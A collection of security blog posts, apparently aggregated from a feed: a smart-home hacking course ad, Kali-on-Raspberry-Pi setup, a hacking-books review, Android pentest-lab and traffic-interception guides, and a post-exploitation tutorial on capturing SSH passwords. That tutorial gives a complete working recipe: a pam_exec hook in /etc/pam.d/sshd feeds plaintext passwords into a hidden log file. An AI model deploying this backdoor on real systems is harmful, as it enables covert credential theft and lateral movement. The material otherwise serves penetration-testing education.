Welcome back, my aspiring cyberwarriors!

Smart homes are increasingly becoming common in our digital world! These smart home devices have become of the key targets of malicious hackers. This is largely due to their very weak security. In 2025, attacks on connected devices rose 400 percent, with average breach costs hitting $5.4 million

In this three-day class, we will explore and analyze the various security weaknesses of these smart home devices and protocols.

Course Outline

1. Introduction and Overview of Smart Home Devices
2. Weak Authentication on Smart Home Devices
3. RFID and the Smart Home Security
4. Bluetooth and Bluetooth LE vulnerabilities in the home
5. Wi-Fi vulnerabilities and how they can be leveraged to takeover all the devices in the home
6. LoRa vulnerabilities
7. IP Camera vulnerabilities
8. Zigbee vulnerabilities
9. Jamming Wireless Technologies in the Smart Home
10. How attackers can pivot from an IoT devices in the home to takeover your phone or computer
11. How to Secure Your Smart Home

This course is part of our Subscriber Pro training package

Tel Aviv, Israel based Tenzai has developed an AI-driven platform for penetration testing, which it says can continuously identify and address vulnerabilities.

The post Tenzai Raises $75 Million in Seed Funding to Build AI-Powered Pentesting Platform appeared first on SecurityWeek.

Welcome back, my aspiring cyberwarriors!

The Raspberry Pi is small and affordable single-board computer that has become extraordinarily popular. Built upon the powerful and efficient ARM processor, it can be used for hacking and pentesting! It might be the ideal, low-cost platform to start your journey in cybersecurity.

Installing Kali Linux on a Raspberry Pi transforms this affordable single-board computer into a powerful portable hacking platform. In this article, we will walk through the entire installation process, from preparation to post-installation configuration.

Understanding the Requirements

Before beginning the installation process, you’ll need to ensure you have the proper hardware and software components. I’m going to use a Raspberry Pi 4, which requires a microSD card with at least 16GB of storage.

Your power supply should be able to deliver at least 3A at 5V. Insufficient power can cause system instability and boot failures. Additionally, you’ll need a computer with an SD card reader to write the Kali Linux image to your microSD card.

Downloading the Kali Linux ARM Image

Navigate to the official Kali Linux website and locate the ARM images section. The Raspberry Pi 4 uses the ARM64 architecture, so you’ll need to download the specific Kali Linux Raspberry Pi 2/3/4/400/5/500 image. This image is pre-configured for the Pi’s hardware and includes the necessary drivers and kernel modifications.

Preparing Your microSD Card

Insert your microSD card into your computer’s card reader. Before writing the Kali image, you should format the card to ensure a clean installation. On Windows, you can use the built-in Disk Management tool or a third-party utility. Linux users can utilize the fdisk or Disk Utility.

Format the card using the FAT32 file system initially, as this provides compatibility across different operating systems. However, keep in mind that this formatting will be overwritten when you write the Kali Linux image, so this step primarily serves to clear any existing partitions and data.

Writing the Image to the microSD Card

For writing the Kali Linux image to your microSD card, several reliable tools are available depending on your operating system. The Raspberry Pi Imager is an excellent choice as it’s officially supported and user-friendly. Download and install this tool from the Raspberry Pi Foundation’s website.

Launch the Raspberry Pi Imager and select your device version.

Next, “Use custom” in the OS window to browse for your downloaded Kali Linux .img.xz file.

Select your microSD card and click Next.

You’ll see a pop-up like above. Click “Edit Settings” so we can set up user credentials, configure Wi-Fi, etc.

Don’t forget to check the Services tab and enable SSH access.

After that, we can proceed to the writing.

The writing process typically takes 10-30 minutes, depending on your card’s speed and the image size. The imager will write the image and then verify the write operation to ensure data integrity. Once completed, you’ll see a success message indicating the process finished without errors.

Initial Boot Configuration

After successfully writing the image, remove the microSD card from your computer and insert it into your Raspberry Pi 4. Connect your Pi to a monitor using an HDMI cable, and attach a keyboard and mouse via USB ports. Or wait for connecting via SSH.

The first boot will take longer than subsequent boots as the system expands the filesystem to utilize the full capacity of your microSD card and performs initial configuration tasks.

To log in, use your username and password that were specified in the imager.

Post-Installation System Updates

Once you’ve successfully logged into your new Kali Linux system, the first critical step is updating all packages to their latest versions. Open a terminal and execute the package manager update commands.

kali> sudo apt update -y

After the initial updates are complete, consider upgrading the system to ensure all packages are at their newest versions.

kali> sudo apt upgrade -y

Summary

Successfully installing Kali Linux ARM on your Raspberry Pi 4 provides you with a capable, portable hacking platform. The combination of Kali’s huge tool suite and the Pi 4’s improved performance creates a great environment for security ops, learning, and professional penetration testing activities.

The post Getting Started with the Raspberry Pi: How to Install Kali Linux ARM Edition first appeared on Hackers Arise.

Welcome back, my aspiring cyberwarriors!

Landing on a Linux machine after exploitation or with freshly harvested credentials often feels like a victory, but in reality, it is only the beginning of the struggle. Lateral movement in Linux environments is notoriously trickier than in Windows domains. Even if you manage to obtain root on one host, you might quickly hit a wall: you see evidence of users connecting to other systems, but you don’t have their credentials. Without those, further expansion stalls. Techniques such as dumping memory or scraping process data might work in some cases, but SSH processes in particular won’t reveal user credentials so easily. At first glance, it feels like a dead end.

This is where PAM manipulation comes into play. By modifying how the Pluggable Authentication Module handles logins, it becomes possible to quietly capture user credentials whenever they authenticate. This is how you create a systematic way to harvest SSH passwords and reuse them for lateral movement.

Recon with Known Hosts

Before diving into PAM patching, it is useful to gather some context about the network and where legitimate users are connecting. SSH clients store previously accessed servers in a known_hosts file under each user’s .ssh directory. If those files are accessible, they give a list of destinations without the need for noisy scanning.
For example, inspecting /home/dev3/.ssh/known_hosts might reveal entries such as git. That single clue suggests a pivot point. If the compromised machine is in a restricted environment, that host may sit in another subnet or behind access controls you couldn’t otherwise reach. With the right credentials, this file becomes a roadmap for lateral movement.

Preparing the Host

Before implementing a credential capture mechanism, it’s important to ensure the host accepts password-based logins. SSHD can be configured to forbid password authentication entirely, relying solely on key-based access. To enable credential capture, the following must be set in /etc/ssh/sshd_config:

target# > nano /etc/ssh/sshd_config

PasswordAuthentication yes

Once this change is in place, the groundwork is set.

Creating a Logging Script

The next step is creating a small script that will record login attempts. With root privileges, create a new file at /usr/local/bin/logc.sh:

target# > nano /usr/local/bin/logc.sh

#!/bin/bash

echo "$(date) User: $PAM_USER Password: $(cat -), From: $PAM_RHOST" >> /var/log/.authc.log

Make it executable:

target# > chmod 777 /usr/local/bin/logc.sh

Then prepare the hidden log file that will quietly collect captured data:

target# > touch /var/log/.authc.log

This script is simple yet powerful. It captures the username, the plaintext password, the source of the connection, and timestamps each entry.

Patching PAM

With the logging script in place, the next task is to insert it into the PAM authentication chain. PAM configurations vary slightly between distributions, but for SSH specifically, the relevant file is /etc/pam.d/sshd. For broader system-wide coverage, other files such as /etc/pam.d/common-auth (Debian/Ubuntu) or /etc/pam.d/password-auth (CentOS) could be patched instead.

To modify SSH authentication only, open /etc/pam.d/sshd and add the following line at the very top:

target# > nano /etc/pam.d/sshd

auth optional pam_exec.so quiet expose_authtok /usr/local/bin/logc.sh

This ensures that every authentication attempt, successful or not, passes through the logging script before continuing with normal PAM processing. Credentials are silently exfiltrated while legitimate users remain unaware.

Applying and Testing the Patch

For the changes to take effect, restart the SSH service:

target# > service sshd restart

Once restarted, test the patch by logging in with valid credentials.

Afterwards, check the log file:

target# > cat /var/log/.authc.log

Each entry should display the captured user, the password they entered, the remote host they connected from, and the date of the attempt. Over time, this log will accumulate valuable credentials from legitimate user sessions, giving you a resource for lateral movement.

Summary

There is a great method of harvesting SSH credentials on Linux by modifying the Pluggable Authentication Module (PAM). After identifying potential lateral movement targets via known_hosts, SSH is reconfigured to allow password authentication. A custom logging script is created to capture usernames, passwords, and remote sources, and is then integrated into PAM by editing /etc/pam.d/sshd. With the patch in place, every login attempt is silently recorded to a hidden log file. Restarting SSH activates the change, and future connections yield a steady stream of usable credentials. 

The post Password Cracking: Stealing SSH Credentials with PAM first appeared on Hackers Arise.

Jeff Barbi // *Guest Post Background Unless you’re pentesting mobile apps consistently, it’s easy for your methodologies to fall out of date. Each new version of Android brings with it […]

The post Start to Finish: Configuring an Android Phone for Pentesting appeared first on Black Hills Information Security.

Documentation

Documentation

Prerequisites

• Python 3.8 and above (https://www.python.org/downloads/release/python-3810/)
• wkhtmltopdf 0.12.6 and above (https://wkhtmltopdf.org/downloads.html)

Installation

The tool has been tested using Python 3.8.10 on Kali Linux 2022.2/3, Ubuntu 20.04.5 LTS, Windows 10/11.

Windows Installation

  git clone https://github.com/Anof-cyber/APTRS.git
  cd APTRS
  install.bat

Linux Installation

  git clone https://github.com/Anof-cyber/APTRS.git
  cd APTRS
  install.sh

Running

Windows

  run.bat

Linux

  run.sh

Features

• Demo Report
• Managing Vulnerabilities
• Manage All Projects in one place
• Create a Vulnerability Database and avoid writing the same description and recommendations again
• Easily Create PDF Reprot
• Dynamically add POC, Description and Recommendations
• Manage Customers and Comapany

Screenshots

Project

View Project

Project Vulnerability

Project Report

Project Add Vulnerability

Roadmap

• Improving Report Quality
• Bulk Instance Upload
• Pentest Mapper Burp Suite Extension Integration
• Allowing Multiple Project Scope
• Improving Code, Error handling and Security
• Docker Support
• Implementing Rest API
• Project and Project Retest Handler
• Access Control and Authorization
• Support Nessus Parsing

Authors

• Sourav Kalal

It does not matter if you want to be a bug bounty hunter, or get employed as a penetration tester, in order to increase your ethical hacking skills, you must constantly learn. One of the knowledge sources, are the books. So, today we are going to review best books for ethical hacking.

I have read most of the books from the list. Being a cybersecurity professional myself, I can rate how useful these books are. Without a doubt there is no golden book that will teach you everything. Each of them provides value in different ways.

Reading technical books is great. It will broaden your mind and teach you things you couldn’t think of before. This is especially important in ethical hacking – the more different hacking methods you know, the more likely you will be able to find new vulnerabilities.

But what is more important is the practice. That’s why in each of the book reviews I’ve recommended vulnerable application to train and apply book concepts on. For example, to understand the web application vulnerabilities, you might to practice on DVWA.

So, today we are going to talk about the best books for ethical hacking. I am sure that anyone, from a complete beginner to a seasoned professional will find value in these books.

In a Rush? Check the 5 Top Picks

Image	Book	Difficulty	Description
	The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws	Beginner to intermediate	Check the Book on Amazon
	RTFM: Red Team Field Manual	Intermediate to advanced	Check the Book on Amazon
	The Hacker Playbook 3: Practical Guide To Penetration Testing	Intermediate	Check the Book on Amazon
	Hacking: The Art of Exploitation	Intermediate	Check the Book on Amazon
	Penetration Testing: A Hands-On Introduction to Hacking	Beginner	Check the Book on Amazon

Publishers of the Ethical Hacking Books

When it comes to the penetration testing and hacking books, there are a few big publishers:

• Wiley
• Packt
• ‎McGraw Hill (All-In-One type of books)
• ‎No Starch Press

There are also some independent writers who had managed to write a book and release it from their own pocket. The books could be found on Amazon. However, the books vary in quality as nowadays it is very easy to create an e-book and put it for sale as a digital product.

But the real knowledge lies in various blogs, like the bughacking.com itself. As the industry is growing at a fast pace, for the newest information you have to refer various sources. And the write-ups of the security researchers that managed to find zero-days are pure gems. It teaches you the latest vulnerabilities and vulnerability searching methodologies.

Books do become obsolete and the knowledge might be a little bit outdated. Especially if the books were released 3, 5, or even more years ago. Although if a book is well written, it holds value for many years. After all, the cybersecurity basics and the goals of the criminals does not change that drastically..

Best Ethical Hacking Books

These are some of the best books for cybersecurity professionals and penetration testers.

Hacking for Dummies

Difficulty: beginner

This book is great for: anyone who wants to gain basics of the hacking. Even non technical people will benefit from the book.

Hacking for Dummies is a book of the For Dummies series. Written by the Kevin Beaver, CISSP with 27 years of experience in the IT security, the book covers the main concepts of hacking pretty well.

Book topics includes:

• Security testing – why is it needed, how do you start, what tools to use, how to identify the security flaws, and how to evaluate the results
• Hacking mindset – what is it and how you can gain one
• Social engineering, physical security
• Network hacking, operating systems hacking, applications hacking
• Prioritizing vulnerabilities, patching them, increasing the security psoture

On the April 8 of 2022, 7th edition of the book was released. As this is the updated version of the book, it covers new topics, such as Windows 11 security issues.

If you are a complete beginner in hacking, this is really the book to go. It does not require a comprehensive IT background, explains the things in an easily understandable way, and guides you in your further learning.

Hacking: The Art of Exploitation

Difficulty: intermediate (not a “for dummies” type of book)

This book is great for: developers that wants to improve their security knowledge; novice hackers

Even though this books was written in the 2008, it is still relevant nowadays. Hacking: The Art of Exploitation is book that goes deep with the hacking concepts. And that’s why this book is praised – instead of being another book about high level attacks, such as SQL injection, XSS, or RCE, the book is goes into explaining programming concepts (over 100 book pages are dedicated for this topic. C programming language is used for the examples), code exploitation (ex. buffer overflow with code snippets that shows what is going on under the hood), networking, cryptography, shell scripts, and countermeasures against attacks.

These are main things you will learn after thoroughly reading the book:

• Basic C programming, assembly language (definitely a necessary thing to understand before continuing with the modern programming languages), shell scripting
• Arbitrary code execution by exploiting buffer overflow and format strings vulnerabilities
• How everything works on the low level – by using the debugger to inspect processor registers and system memory
• Evade typical security measures and IDS (intrusion detection systems)
• Use port-binding or connect-back shellcode for gaining access to the remote server, and hide your tracks by altering server logs
• Scan ports, sniff network traffic by redirecting it to your machine, and hijack TCP connections
• Crack WiFi traffic with specialized attacks
• .. and many other things

While this is not a book that will make you a professional penetration tester overnight, the material explained in the book is a must for a deeper understanding of the art of hacking. This is one of the books you should start with as it teaches you the hacker mindset (but don’t expect to magically get this mindset only from one book).

The Basics of Hacking and Penetration Testing

Difficulty: beginner

This book is great for: for those who want to get the basics of ethical hacking

This is another great book for hackers that are just starting. If you are an advanced penetration tester, you might not benefit much from the book. But for those who do not have the basics, this is the perfect starting point.

You might find the following topics in the book:

• Penetration testing introduction (Kali Linux, creating hacking lab, phases of the penetration test)
• Reconnaissance (main tools and methods of recon)
• Scanning (different types of port scans with Nmap)
• Exploitation (Medusa, Metasploit, password cracking, Wireshark, and more)
• Social engineering
• Web based exploitation (spidering, intercepting, scanning, attacking)
• Post exploitation and maintaining access (backdoors, rootkits, Meterpreter, Netcat)
• Delivering penetration testing results (writing a report)

While published in the 2013, the book is still relevant today as it nails the basics pretty well. Tools covered in the book are still actively maintained nowadays. And other topics, such as social engineering, are evergreen as it exploits the same aspects of the human psychology just in different ways.

The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws

Difficulty: beginner-intermediate

This book is great for: beginners (to learn web vulnerabilities), penetration testers (great reference guides during pen testing), developers

Calling this book The Bible of web application penetration testing would be brave, but it’s close to that. The book covers majority of the topics of web application security testing. This book is written by the people behind Burp Suite – one of the most popular tools for web app security testing.

The 912 pages of this book cover the following topics:

• Web Application security
• Core Defense Mechanisms
• Web Application Technologies
• Mapping the Application
• Bypassing Client-Side Controls
• Attacking Authentication
• Attacking Session Management
• Attacking Access Controls
• Attacking Data Stores
• Attacking Back-End Components
• Attacking Application Logic
• Attacking Users: Cross-Site Scripting
• Attacking Users: Other Techniques
• Automating Customized Attacks
• Exploiting Information Disclosure
• Attacking Native Compiled Applications
• Attacking Application Architecture
• Attacking the Application Server
• Finding Vulnerabilities in Source Code
• A Web Application Hacker’s Toolkit
• A Web Application Hacker’s Methodology

The second edition of the book was released in 2011. However, even though over 10 years had passed, the same vulnerabilities are often found in the modern software. This is a comprehensive guide of the web vulnerabilities that can be used as a reference guide. If you are a penetration tester, this is a book you must have on your shelve

Linux Basics for Hackers: Getting Started with Networking, Scripting, and Security in Kali

Difficulty: beginner

This book is great for: people who want to get the basics of Linux

Linux is something that every aspiring hacker has to known. Not only many popular cybersecurity tools are written for Linux operating systems, Linux is often used as an operating system for hosting business applications. So, you will face Linux often if you are going to be a penetration tester. Knowing the main concepts of the operating system will help you to understand more advanced ethical hacking topics.

But the book provides more than the Linux basics. It covers many interesting Linux security topics that will come in handy working as an ethical hacker. Some of the topics are:

• Covering tracks by changing network information and clearing logs
• Scanning network connections
• Using TOR, proxy, VPS, encryption
• Writing your own bash scripts
• Abusing common services (MySQL, Apache, OpenSSH)

This can be considered as one of the best Kali Linux books. While talking about Kali, it teaches your about the Linux in general, as Kali Linux is based on Debian.

If you not only want to learn the Linux basics, but also to hack on Linux, this is a book to go. It covers some Kali Linux tools, such as aircrack-ng.

While the book is not the longest one (it has 247 pages), you will definitely find value. Even if you are an experienced Linux user.

Social Engineering: The Science of Human Hacking

Difficulty: beginner

This book is great for: everyone (in order to know how not to fall victim)

This book not a hands-on technical guide. However, it talks about very important hacking subject – social engineering. Human is the weakest link. It is easier to trick a person into revealing his or her password, instead of spending resources and time cracking the password.

And when it comes to the corporate networks, the consequences of one employee opening malicious email, can be disastrous. That’s why the social engineering is something every ethical hacker should know.

Some of the companies are even hiring hackers to execute phishing campaigns in order to raise employees awareness. And more than that – sometimes you even have to use social engineering to get into the building. After such exercise, it can be evaluated how many employees became the victims of organized campaign.

The book Social Engineering: The Science of Human Hacking will teach you:

• The most common social engineering tricks
• Techniques that are not effective
• Some of the infamous cases of the social engineering that made it to the headlines
• Skills needed to be a social engineer
• Counter measures against social engineering

This is one of the best books of social engineering.

Advanced Penetration Testing: Hacking the World’s Most Secure Networks

Difficulty: intermediate

This book is great for: penetration testers

If you’ve mastered the basics of penetration testing, this is a book if you want to level up your skills. It talks about social engineering, command and control centers, privilege escalation, network infiltration. Basically it guides you through the main steps how the red teamers operate.

In the book, you are being introduced with ransomware gangs and how the gangs are operating, infiltrating the networks, and achieving their objectives. The book is pretty informative, as it contains code snippets of scripts used for the attacks.

The book contains examples of how the cyber kill chain steps are being implemented in the wild. From discovering the attack vectors, to creating custom code in order to achieve your goals.

It also has many different stories by the author from the security assessments he had personally participated. This makes the book a perfect source of a specific security knowledge, as it contains unique examples.

RTFM: Red Team Field Manual

Difficulty: intermediate-advanced

This book is great for: red teamers and penetration testers

RTFM is heavily focused on the red teamers, but this is also a great book for penetration testers. Even though it has only 96 pages, it provides great value.

RFTM is a big cheat sheet with various commands beneficial during the red team engagement. It contains information on many topics:

• Unix
• Windows
• Networking
• Web
• Databases
• Programming
• Wireless

Not only the guide shows simple commands handy during the red teaming engagement, it explains how to use penetration testing tools, and also provides useful information (ex. the most common ports, broadcast addresses).

What is important to understand about the book, is that it is a reference book. This is not another tutorial that shows how to install Linux, or run Kali Linux tools.

The Hacker Playbook 3: Practical Guide To Penetration Testing

Difficulty: intermediate

This book is great for: penetration testers

Another great book for hacking web applications and networks. It contains everything you need to become a good ethical hacker:

• Using the most common tools (Cobalt Strike, Metasploit, PowerShell, and many other)
• Performing reconnaissance
• Web application vulnerabilities
• Compromising the networks
• Social engineering and technical part of performing a social engineering attack
• Physical attacks (not that type of attacks you thought. Network attacks)
• Various tricks of cracking, exploiting systems, disabling logging, etc.

The Web Application Hacker’s Handbook is very comprehensive guide that will introduce you with the main techniques and tools of hacking. If you are a beginner, you might want to choose a less advanced book, however if you are dedicated enough, you will learn a lot. However, you might not understand everything the book says, but you can always re-read it after you’ve gained more experience.

Penetration Testing: A Hands-On Introduction to Hacking

Difficulty: beginner

This book is great for: penetration testers, developers

Another great book about hacking that covers basics needed to be a good penetration tester. As the name of the book indicates, this is a hands-on book focusing in providing relevant examples instead of theoretical situations.

With the book there comes a lab where you can practice the things explained in the book. However, as the book is released in 2014, the labs are a little bit outdated. But as there are platforms, such as TryHackMe, or Hackthebox, you can easily find where to practice.

If you are a beginner in the penetration testing but you have IT background, this book will give you a comprehensive view of the penetration testing field.

The book is separated into five different parts:

• Part I talks about basics of penetration testing (Kali Linux, virtual labs, programming, using Metasploit)
• Part II covers assessments essentials (information gathering, finding vulnerabilities, capturing traffic)
• Part III talks about different attacks (password attacks, client side attacks, social engineering, web application, wireless), antivirus bypasses, post exploitation activities
• Part IV explains about buffer overflow vulnerabilities in Linux, and Windows, exception handler overwrites, fuzzing, porting exploits, and Metasploit modules
• Part V focuses on mobile hacking (and using the Smartphone Pentest Framework)

The hands on approach of the book makes it a great choice if you want to get practical skills. It also covers mobile hacking, which is rarely talked about in other books.

Real-World Bug Hunting: A Field Guide to Web Hacking

Difficulty: intermediate

This book is great for: penetration testers

The book is perfect for the beginners of penetration testing. Even if you do not have an IT background, you will understand the things explained in the book. Although having the general IT knowledge won’t hurt.

Real-World Bug Hunting talks about the classic vulnerabilities:

• Open Redirect
• HTTP Parameter Pollution
• Cross-Site Request Forgery
• HTML Injection and Content Spoofing
• Carriage Return Line Feed Injection
• Cross-Site Scripting
• Template Injection
• SQL Injection
• Server-Side Request Forgery
• XML External Entity
• Remote Code Execution
• Memory Vulnerabilities
• Subdomain Takeover
• Race Conditions
• Insecure Direct Object References
• OAuth Vulnerabilities
• Application Logic and Configuration Vulnerabilities

It also covers bug bounty basics (including how you can find the bug bounties). The book also teaches writing vulnerability reports, and provides a list of tools used by the hackers on a daily basis.

This book stands out from the other ones of the same genre. With each of the explained vulnerability, there are actual examples based on the HackerOne vulnerability reports. Not only you learn the basics, but you get an example of how the vulnerabilities look in the wild.

All in all, this is one of the best hacking books covering main web application vulnerabilities. Specific examples allows you to understand how you can find the given vulnerability in real targets.

Ethical Hacking: A Hands-on Introduction to Breaking In

Difficulty: beginner-intermediate

This book is great for: penetration testers

This is one of the newest books of the list, but it it is not inferior to its competitors. As the book was published in the 2021, it has the most up-to-date examples. The book is well written, informative, and covers most of the basics of the ethical hacking.

The books talks about intermediate level penetration testing topics. So, understanding the subjects fully requires some technical background. If you are coming from other IT position, this book will be a great entry point to the ethical hacking. If you are a complete newbie, this might be a little bit over your head. But with enough dedication you will be able to crack the topics.

The book is divided into five big parts:

• Part I: Network Fundamentals
• Part II: Cryptography
• Part III: Social Engineering
• Part IV: Exploitation
• Part V: Controlling the Network

Ethical Hacking: A Hands-on Introduction to Breaking In contains many practical tasks, such as:

• Capturing the traffic and analyzing in the Wireshark. This is a task you will often face when performing internal network penetration tests.
• Using Mimikatz to capture passwords in corporate Windows networks
• Scanning devices with dedicated tools
• Cracking passwords
• Installing Linux rootkits
• Exploiting corss-site scripting (XSS) vulnerabilities

The way how the book is written makes it one of the best books for penetration testers who are just starting out.

Gray Hat Hacking: The Ethical Hacker’s Handbook

Difficulty: beginner-intermediate

This book is great for: those who want to start the penetration testing career

If you are determined to become good at penetration testing, this is one of the books that you could use to start your journey.

The book goes a little bit deeper than the usual “for dummies” type of book. The sixth edition, released in March 9, 2022, has 704 pages and covers many different relevant ethical hacking topics. Including:

• Basics of C, Assembly, and Python programming
• Different types of fuzzing (the book also has lab exercises where you can learn to use fuzzing tools)
• Reverse engineering methods
• Software-defined radio hacking
• Penetration testing essentials (how you can become a pentester, pentester taxonomy, training, degrees, practicing, etc.)
• Red teaming operations (tactics, scoping, communicating, attack frameworks, …)
• Purple teaming
• Bug bounty programs (history, different types of disclosures, bug bounty programs, incident response)
• Exploiting systems (capturing password hashes, getting shells)
• Basic and advanced Linux and Windows exploitation
• Web application vulnerabilities and exploitation
• Malware analysis
• Ransomware, ATM malware
• IoT hacking

The book talks about gray hat techniques that could be successfully used during the daily tasks of a penetration tester. As you might see from the previously stated topics, it covers a variety of ethical hacking subjects. There are plenty of books which, even though are about ethical hacking, focuses on the web application vulnerabilities.

But this one touches topics that are relevant nowadays, such as ransomware, or IoT hacking. It is true that most of the penetration testing job requires to perform tests for web applications. But that does not mean that vulnerabilities exists only in web apps. It has been proven many times, that everything from the IoT devices, to SCADA systems could be hacked. And if you want to become a good penetration tester, you must have basics of different types of devices and systems security. After all, you don’t know what you will have to work with in the future.

The Ghidra Book: The Definitive Guide

Difficulty: intermediate-advanced

This book is great for: penetration testers that wants to improve their skills

While the book is not for the beginners, this is one of the best books for hacking, that every cybersecurity specialist must read. Especially if you want to become good at reverse engineering.

Ghidra is a software reverse engineering suite of tools used by many different reverse engineers. Developed by NSA research directorate, the tool is de facto standard of the reverse engineering. What’s best about the tool, is that it is open source. Currently it has over 33.7k stars on GitHub.

Talking about the Ghidra Book, it covers main topics needed to become good at using the tool. After reading the book, you will be able to:

• Perform disassembly
• Use the Ghidra’s decompiler
• Analyze obfuscated binaries
• Extend Ghidra and build new Ghidra analyzers and loaders
• Add support for new processors and instructions sets
• Script tasks of Ghidra to automate workflows
• Build your own reverse engineering environment

Even thought it talks about advanced topics, if you are completely new in the reverse engineering, this book is a great guide for you. Not only it describes the main features of the Ghidra tool, it goes into the technical details of the actual reverse engineering of the software. And this is not a “read and forget” type of book – you can use it as a reference guide.

Hacking Book Bundles From Humble Bundle

Once in a while Humblebundle.com announces book bundles. During the discount, you can get books that are entirely focused on the cybersecurity topics. Usually there are more than 10 books in the bundle. And the books comes in different formats (EPUB, PDF, MOBI).

For example, this one.

The money paid for the money goes to the charity. So, not only you get a great deal for a cheap price, the money paid serves good purpose.

Unfortunately, after the deal is over, you are not able to buy it. But keep checking the Humblebundle, and you will be able to find great deals. This is definitely not the first one, and probably not the last Humble Bundle offer of great books for cybersecurity professionals.

Further Learning

After you’ve got the basics of hacking, it is very important to practice your skills. And this can be done in many different ways:

• Practice on TryHackMe. This is a platform with gamified lessons. There are plenty of free and premium rooms, where you can try hacking different things.
• Watch cybersecurity tutorials and walkthroughs. There are many great teachers out there: John Hammond, NahamSec (streams on Twitch each sunday), STÖK, David Bombal, and many more. These are the people that create high quality content that is free and available for anyone.

Use this list of best books for hacking as a guide where to go next.

Just keep practicing and don’t stop learning!

The post The 14 Best Books for Ethical Hacking appeared first on Bug Hacking.

Before you start pentest, malware analysis, testing new software, editing system configuration, analyze network traffic or check how virus or RAT works, you should prepare your test environment. Everything you are doing that can goes wrong, you should do in test environment. Time you spent on setting this up is the time you save to fix things

Android network traffic interception is a process of capturing and analyzing network traffic that is transmitted or received by an Android device. This can be useful for various purposes, including debugging network issues, monitoring network activity, and identifying security vulnerabilities.

There are several ways to intercept Android network traffic, each with benefits and limitations. Here are some standard methods I used to capture android network traffic

1. Using a proxy tool: A proxy tool is software that sits between the Android device and the internet, allowing you to intercept and modify the traffic passing through it. Some popular proxy tools for Android include Burp Suite, Fiddler, and Charles. These tools are usually used by developers and security professionals to test an application's security or debug network issues.

2. Using a packet capture tool: Packet capture tools allow you to capture and view the raw network traffic transmitted or received by the Android device. Some popular packet capture tools for Android include WireShark and tcpdump. These tools are often used by network administrators and security professionals to troubleshoot network issues and monitor network activity

3. Using a VPN: A virtual private network (VPN) is a service that encrypts and tunnels your internet traffic through a secure server. Using a VPN, you can intercept and analyze the traffic transmitted or received by the Android device.

In this article, you will learn how to capture android app traffic using Wireshark without any physical connection.

As a Malware Researcher, I have experienced that some android malware is heavily obfuscated, and we cannot use them on emulators. In that case, we must use that malware on the physical device. The Network Interception thing is that we have to pay a closer look, so I used Wireshark to study the behaviour of the Command and Control servers.

I Will show you the exact process I used to remotely capture mobile traffic using Wireshark.

Requirements

After Downloading, Open the app, go to Settings, and Click on Install. It will install a Certificate. 

In the menu, you can choose any app to capture that app's traffic

Setup for Wireshark

After that, You have to Open Wireshark and click on the SSH Capture settings icon, configure the IP address you will get from the PCAP Remote's Network interfaces, configure the port, and use any username and password for authentication.

Conclusion

In this blog post will discuss everything you need to know as an Android app penetration tester. Whether you are a Bug bounty hunter, a working cyber security professional, or a random security researcher, this blog will surely benefit you.

I will simplify everything in this tutorial so that you do not struggle while setting up your Android Pentesting lab.  I wish no one should face the same issues which I faced earlier. That's why I put my hard work here to give you a clear picture so you can start quickly.

Having a developer background, I Know how to build Android Mobile applications using Java, Kotlin, Flutter, and React Native. I am also good at Building web applications, having good knowledge of frontend and backend, along with OWASP knowledge for Both Web and Android apps. I will share my knowledge through this blog.

Without wasting your valuable time, let me tell you the resources and tools you should have before jumping into Android app pentesting. Also, there are some frequently asked questions you have to know.

Frequently Asked Questions

Setting up Android App Pentesting Environment

Note:
If you try to Run Android Emulators inside Virtual machines, then it won't work. When I was new to Android pen testing, I used to do the same but later realised and Switched all my tools to my Primary machine.

Android app pentesting tools

Burp Suite

apktool

apktool, a tool for android app reverse engineering. We will use this tool to decompile android apps, modify some code and recompile

install apktool

apkleaks

apkleaks a tool for automatic scanning for secret keys, URLs, IP addresses, API endpoints etc

install apkleask

Python

We need Python to use dynamic hooking tools like Frida.

Download Python

Frida

Frida tool/script is used for dynamic hooking so that we can test the application at the run time, overriding the functions, 

You have to install the Frida server on your android emulator, and the Frida client on your machine

Frida on the local machine

if  Python is installed on your local PC, then you can install frida by typing the following in a terminal

pip install frida-tools

you can check if frida is installed or not by typing

frida --version

Alternatively, you can use npm to install frida binaries. As a pentester, I hope everyone is familiar with Python 

Frida server on Android Emulator

This is the frida server; you must download the frida server file according to your emulator's architecture.

Download Frida Server

After downloading the zip file, unzip it, and use adb shell to connect your android emulator

then go to the directory  /data/local/tmp

push the frida-server there

adb push frida-server /data/local/tmp

Now 

adb shell 

then

cd tmp

since it is already an executable file, if not then you can make it executable by giving the permissions

chmod 777 frida-server

run the server

./frida-server

soon we will discuss how to use frida in depth

Objection

objection is a runtime exploitation toolkit based on frida

You can install objection by typing the below command in a terminal

pip3 install objection

Objection on GitHub

How to intercept Android app traffic in Burp Suite

In this section, we will set up the Burp suite to intercept the android app's traffic. Note that if you choose an android emulator for android version 6, it is easy to install the burp suite's CA certificate. You can still install burp CA on android 7 and above.

Configure Burp Suite Proxy

Open Burp Suite

Go to the Proxy tab, then Options, then Click on Add.

Make these settings and bind to port 8080 (You can choose any)

And tick on All Interfaces and save

Configure Proxy settings on Android 

Now its time to configure the proxy on your Android; before that, we will find our local machine's IP and configure that IP on your Android Emulator's Wifi Proxy

To Find the IP address on your Local Machine

Open any terminal and type: 

ipconfig

 (or ifconfig for Linux)

Now Open Android Emulator's Wifi settings, and you will notice that the device is connected to a network, now long click or right-click on the network, and then you will see the options, click on Modify Network.

Now click Advanced, and configure the IP address and port.

Note:
For some emulators, there is another way to achieve this. In the emulator's settings, you will find the settings to change the proxy settings of the device

Configure CA certificate on up to Android 6

Now we have to configure a CA certificate 

Open any Browser, visit htttp://burp

and download the file, rename the file cacert.der to cacert.cer

Now open Settings, then Security, then Install from SD Card.

Now Choose the file, and you are asked to enter a name for the certificate. You can give any name and then click Ok.

Now you are ready to intercept the traffic of your android emulator. Now open Burp suite, and you will see the traffic in the proxy section.

Installing CA cert on Android devices above Android 6

on android version 7, you  need root access to install the CA certificate on your device, 

if you are on Windows, then you need gitbash or WSL to continue

Download OpenSSL Installer for Windows

Steps to Proceed

Export the CA cert from Burp, and save the file as cacert.der

then type the commands

openssl x509 -inform DER -in cacert.der -out cacert.pem

We will use openssl to convert the der file to pem, generate a self-signed certificate, then move the file to Emulator's and install it.

openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1

You will get a hash. Now you have to rename the perm file with this hash.0

mv cacert.pem 9a5ba575.0 

Now move the file to the android emulator's sdcard

It requires root to move the certificate to /system/etc/security/cacerts

For that, we will log in to adb as the root

adb root

then

